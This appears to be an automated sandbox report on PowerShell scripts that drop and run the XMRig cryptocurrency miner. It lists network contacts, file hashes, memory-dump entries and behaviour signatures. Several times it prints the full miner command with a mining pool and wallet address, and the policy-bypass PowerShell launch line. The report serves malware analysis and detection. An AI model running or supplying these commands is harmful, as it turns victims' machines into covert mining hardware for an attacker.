"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 249.197.17.2.in-addr.arpa udp

Files

memory/2948-0-0x00007FF9FFFB3000-0x00007FF9FFFB5000-memory.dmp

memory/2948-2-0x0000018B61F30000-0x0000018B61F52000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lqjcyyh5.cxk.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2948-10-0x00007FF9FFFB0000-0x00007FFA00A72000-memory.dmp

memory/2948-11-0x00007FF9FFFB0000-0x00007FFA00A72000-memory.dmp

memory/2948-12-0x00007FF9FFFB0000-0x00007FFA00A72000-memory.dmp

memory/2948-15-0x0000018B61FA0000-0x0000018B61FAA000-memory.dmp

memory/2948-14-0x0000018B61FC0000-0x0000018B61FD2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2508-46-0x000002C7A43B0000-0x000002C7A43D0000-memory.dmp

memory/2508-47-0x000002C7A4400000-0x000002C7A4420000-memory.dmp

memory/2508-48-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2948-49-0x00007FF9FFFB0000-0x00007FFA00A72000-memory.dmp

memory/2948-50-0x00007FF9FFFB3000-0x00007FF9FFFB5000-memory.dmp

memory/2508-51-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-52-0x000002C7A4440000-0x000002C7A4460000-memory.dmp

memory/2508-53-0x000002C7A4420000-0x000002C7A4440000-memory.dmp

memory/2508-54-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-55-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-57-0x000002C7A4420000-0x000002C7A4440000-memory.dmp

memory/2508-56-0x000002C7A4440000-0x000002C7A4460000-memory.dmp

memory/2508-58-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-59-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-60-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-61-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-62-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-63-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-64-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-65-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-66-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-67-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-68-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-69-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-70-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-71-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-72-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-73-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-74-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-75-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-76-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-77-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-78-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-79-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-80-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-81-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-82-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-83-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-84-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-85-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-86-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-87-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-88-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-89-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-90-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-91-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-92-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-93-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-94-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-95-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-96-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-97-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-98-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-99-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-100-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-101-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-102-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-103-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-104-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-105-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-106-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-107-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-108-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-109-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-110-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-111-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-112-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-113-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-114-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-115-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

memory/2508-116-0x00007FF61D990000-0x00007FF61E5C3000-memory.dmp

Analysis: behavioral31

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 21:13

Platform

win10v2004-20240508-en

Max time kernel

1790s

Max time network

1775s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 249.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
NL 23.62.61.186:443 www.bing.com tcp
US 8.8.8.8:53 186.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 2.36.159.162.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 32.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 6.173.189.20.in-addr.arpa udp

Files

memory/1052-0-0x00007FFF98773000-0x00007FFF98775000-memory.dmp

memory/1052-1-0x0000020D67100000-0x0000020D67122000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mrtggo01.asz.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1052-8-0x00007FFF98770000-0x00007FFF99231000-memory.dmp

memory/1052-12-0x00007FFF98770000-0x00007FFF99231000-memory.dmp

memory/1052-13-0x00007FFF98773000-0x00007FFF98775000-memory.dmp

memory/1052-14-0x00007FFF98770000-0x00007FFF99231000-memory.dmp

memory/1052-16-0x00007FFF98770000-0x00007FFF99231000-memory.dmp

memory/1052-17-0x0000020D7FF60000-0x0000020D7FF72000-memory.dmp

memory/1052-18-0x0000020D670E0000-0x0000020D670EA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4544-49-0x000001DCE59D0000-0x000001DCE59F0000-memory.dmp

memory/4544-50-0x000001DCE5A10000-0x000001DCE5A30000-memory.dmp

memory/4544-51-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-52-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-54-0x000001DCE5A30000-0x000001DCE5A50000-memory.dmp

memory/4544-53-0x000001DCE5A50000-0x000001DCE5A70000-memory.dmp

memory/4544-55-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/1052-56-0x00007FFF98770000-0x00007FFF99231000-memory.dmp

memory/4544-57-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-58-0x000001DCE5A50000-0x000001DCE5A70000-memory.dmp

memory/4544-59-0x000001DCE5A30000-0x000001DCE5A50000-memory.dmp

memory/4544-60-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-61-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-62-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-63-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-64-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-65-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-66-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-67-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-68-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-69-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-70-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-71-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-72-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-73-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-74-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-75-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-76-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-77-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-78-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-79-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-80-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-81-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-82-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-83-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-84-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-85-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-86-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-87-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-88-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-89-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-90-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-91-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-92-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-93-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-94-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-95-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-96-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-97-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-98-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-99-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-100-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-101-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-102-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-103-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-104-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-105-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-106-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-107-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-108-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-109-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-110-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-111-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-112-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-113-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-114-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-115-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-116-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-117-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

memory/4544-118-0x00007FF7AAEC0000-0x00007FF7ABAF3000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:39

Platform

win10v2004-20240508-en

Max time kernel

1795s

Max time network

1760s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 249.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 100.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 99.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 104.193.132.51.in-addr.arpa udp

Files

memory/1160-0-0x00007FFD5BCF3000-0x00007FFD5BCF5000-memory.dmp

memory/1160-1-0x00000265F16F0000-0x00000265F1712000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fngrahw4.lwn.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1160-11-0x00007FFD5BCF0000-0x00007FFD5C7B1000-memory.dmp

memory/1160-12-0x00007FFD5BCF0000-0x00007FFD5C7B1000-memory.dmp

memory/1160-13-0x00007FFD5BCF3000-0x00007FFD5BCF5000-memory.dmp

memory/1160-14-0x00007FFD5BCF0000-0x00007FFD5C7B1000-memory.dmp

memory/1160-16-0x00007FFD5BCF0000-0x00007FFD5C7B1000-memory.dmp

memory/1160-17-0x00000265F1A80000-0x00000265F1A92000-memory.dmp

memory/1160-18-0x00000265F1A60000-0x00000265F1A6A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4964-49-0x00000273BA450000-0x00000273BA470000-memory.dmp

memory/4964-50-0x00000273BA4A0000-0x00000273BA4C0000-memory.dmp

memory/4964-51-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-52-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-54-0x00000273BA4E0000-0x00000273BA500000-memory.dmp

memory/4964-53-0x00000273BA4C0000-0x00000273BA4E0000-memory.dmp

memory/1160-55-0x00007FFD5BCF0000-0x00007FFD5C7B1000-memory.dmp

memory/4964-56-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-57-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-60-0x00000273BA4E0000-0x00000273BA500000-memory.dmp

memory/4964-59-0x00000273BA4C0000-0x00000273BA4E0000-memory.dmp

memory/4964-58-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-61-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-62-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-63-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-64-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-65-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-66-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-67-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-68-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-69-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-70-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-71-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-72-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-73-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-74-0x00007FF703260000-0x00007FF703E93000-memory.dmp

memory/4964-75-0x00007FF703260000-0x00007FF703E93000-memory.dmp

